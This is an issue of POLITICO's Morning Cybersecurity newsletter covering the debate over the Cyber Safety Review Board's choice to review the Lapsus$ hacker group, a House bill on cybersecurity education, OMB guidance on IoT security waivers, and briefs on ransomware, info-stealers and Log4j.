With help from Eric Geller 

—The Cyber Safety Review Board has identified a rabble-rousing extortion group as the subject of its second-ever review. It’s a choice that some deem far-sighted — and others fear misses the mark.

HAPPY MONDAY, and welcome to Morning Cybersecurity! “Goblin Mode” has been named Oxford English Dictionary’s 2022 word of the year — and I have absolutely nothing smart to say about that.

Got tips, feedback or other commentary? Send them my way at [email protected]. You can also follow @POLITICOPro and @MorningCybersec on Twitter. Full team contact info is below.

Homeland Security Secretary Alejandro Mayorkas speaks at a Center for Strategic and International Studies event on the “convergence” of national and homeland security. 2 p.m.

Want to receive this newsletter every weekday? Subscribe to POLITICO Pro. You’ll also receive daily policy news and other intelligence you need to act on the day’s biggest stories.

MISSED OPPORTUNITY? — DHS’s decision to direct the Cyber Safety Review Board to study the Lapsus$ hacker ring is drawing a mixture of criticism and praise from the cybersecurity community, with experts divided about the value of probing a group whose remarkable success and conspicuous style have already made it the subject of extensive public review.

The argument for — A member of the 10-month-old independent investigatory group, which is staffed by public and private cybersecurity experts, told MC they were happy with the decision to make Lapsus$ the focus of board’s second-ever review because it represented “the most dangerous threat actor today … and it's not even close.”

The individual, who was granted anonymity to speak openly about the board, defended the idea that a review of Lapsus$ could add significant value to the community, even though there is voluminous reporting on how it used basic malware and innovative social engineering techniques to run amok through well-resourced technology companies, among them Okta, Uber, Microsoft and Rockstar Games.

“To the best of our knowledge, there has not been a public, comprehensive review of Lapsus$ tradecraft, or why they were so effective against the most well-resourced companies on the planet,” said the CSRB board member.

Because their techniques will likely be picked up by other hacking groups, “a CSRB review can add significant value to the community,'' added the individual.

The argument against — The shortcomings of DHS’s choice have less to do with what it did direct the independent board to study than what it didn’t, argued Trey Herr, director of the Atlantic Council’s Cyber Statecraft Initiative.

“The government is giving up an opportunity to do a whole lot more,” said Herr, who lamented that the government and private sector already have multiple projects dedicated to understanding Lapsus$ and the digital extortion racket more broadly.

Meanwhile, the CSRB has again punted on the idea of conducting a review of the SolarWinds campaign — the issue President Joe Biden first directed the board to investigate when he established the CSRB in May 2021.

Official response? — Asked why DHS neglected to assign a study of the infamous Russian campaign for the second time, a spokesperson for the department told MC it conducts reviews on topics “that are most relevant to the current threat landscape and that can have an immediate impact.”

“The review into Lapsus$ is a clear opportunity to achieve that,” continued the spokesperson.

Room for improvement — Six other security experts and former U.S. officials who spoke with MC came out 4-2 in favor of the Lapsus$ choice. But almost every one qualified their answers because they weren’t sure why the board made its choice or where they intended to take the study.

And that speaks to a related issue for the CSRB, said Josh Corman, former chief strategist on CISA’s Covid-19 task force.

“The need for a trustworthy institution like the CSRB cannot be understated,” said Corman, now vice president of cyber safety strategy at Claroty. But “to establish that trust, it likely needs greater transparency regarding the criteria and process for nominating, prioritizing and selecting different topics.”

FIRST IN MC: THE OLD COLLEGE TRY — A freshman House Democrat who has taken an interest in cyber policy issues wants the White House to figure out new ways to get cybersecurity education into college classrooms, with a view toward diversifying the largely white, male field.

Rep. Ritchie Torres (D-N.Y.) on Friday introduced a bill, first reported by MC, that would require National Cyber Director Chris Inglis to convene a task force to produce “recommendations and guidance with respect to how to increase and promote cybersecurity courses, degrees, and programs in institutions of higher education in order to improve the diversity of the cybersecurity workforce.”

— Why it matters: Torres, a member of the House Homeland Security Committee, has stood out at panel hearings for his sharp questioning of Biden administration officials over cybersecurity shortcomings. In August, he told Eric and Maggie that he’s unsatisfied with the administration’s largely non-regulatory approach to protecting critical infrastructure.

With two longtime cyber-focused House lawmakers retiring in January, Torres is poised to become a more prominent advocate for cyber issues in the newly Republican-controlled chamber.

The new bill represents Torres’ attempt to increase pressure on the White House to prod colleges and universities into creating more pathways to cyber careers for more people.

— What he’s saying: “Fostering a culture of cybersecurity in all arenas of life is a matter of urgency, and nowhere more so than in higher education,” Torres told MC. “The lack of training in cybersecurity – even among graduates of computer science – has left a dangerous void in contemporary cyber education.” He cited “the history of malign neglect” that led to the Log4j vulnerability crisis, which “could have been prevented if the software developers had been sufficiently educated about best practices in secure coding.”

— How it would work: The bill would direct Inglis to assemble a team comprising representatives from CISA and higher education institutions, including those specifically serving Hispanic, Black and tribal populations. The task force would be required to submit an initial report with recommendations after one year, with subsequent reports due every two years.

— What’s next: Torres’ bill now awaits committee consideration. In the meantime, Inglis’ office is already working on a cyber workforce and education strategy that could either include or lead to the development of recommendations similar to what Torres envisions.

IN THE NICK OF TIME — The Office and Management and Budget has published guidance instructing federal agencies how to request opt-outs for a first-of-its-kind Internet of Things security law, just days before a key provision of the law takes effect.

The Friday memo from OMB director Shalanda D. Young stipulates that federal chief information officers can receive waivers to procure or use connected devices that do not meet new NIST standards surrounding IoT security and bug reporting if they file reports that include a rationale for the decision, information on how long they expect the carve-outs to apply and the signature of an agency head.

Ringing the bell — The memo came less than 24 hours after the Government Accountability Office warned OMB that a failure to produce the guidance before today — when federal agencies will be restricted from using or procuring noncompliant IoT devices — “could result in a range of inconsistent actions across agencies.”

RANSOMWARE TRENDS — The LockBit ransomware group accounted for more than a third of all ransomware attacks in the first half of 2022, finds research out this morning from cybersecurity firm Looking Glass. According to ransomware experts MC has interviewed in recent weeks, that’s due to two factors: First, the group has introduced updates to its code automating how affiliates — hackers to whom LockBit contracts out attacks — identify and exploit vulnerabilities in a network. Moreover, the group has built a network of top-tier affiliates.

RISE OF THE INFOSTEALER — Malicious software purpose-built to pilfer people’s log-in information is the new craze in the criminal underground, according to data out this morning from Accenture. The researchers believe the cheap, effective and easy-to-use nature of info-stealers produced a “marked increase” in the number of credentials for sale between July and October of this year. Another driver of their popularity? The very same Lapsus$, who relied heavily on info-stealers during its jaunt through some of the world’s biggest tech companies.

LOG4J THORN IN THE SIDE — The first subject of a CSRB review, Log4J, continues to pose a major threat to organizations, finds research out this morning from cybersecurity firm Arctic Wolf. Twenty-five percent of the victims the firm works with saw hackers try to exploit the bug in the widely-used Java logging framework in the last year, while 60 percent of the Log4J cases it responded to traced back to top-tier ransomware groups, like the aforementioned LockBit. Though the initial CSRB report warned the problem would plague the security community for a decade or more, its “sobering” to see the bug become such a popular target for hackers, concluded Arctic Wolf.

Security researcher Matt Tait, formerly of GCHQ and Corellium, has an interesting write-up that examines how Russia might be using Telegram to conduct espionage in occupied portions of Ukraine.

— The original equipment manufacturers of Android phones had their certificates stolen to spread malware. (Wired)

— CommonSpirit Health finally fesses up to suffering a ransomware incident. (CommonSpirit.org)

— A new wiper that masquerades as ransomware is wreaking havoc in Russia. (Ars Technica)

— Russia is coordinating Ukraine hacks with missiles and could increasingly target European allies, Microsoft warns. (POLITICO)

Chat soon. 

Stay in touch with the whole team: Eric Geller ([email protected]); Maggie Miller ([email protected]); John Sakellariadis ([email protected]); and Heidi Vogt ([email protected]).

~~~~~~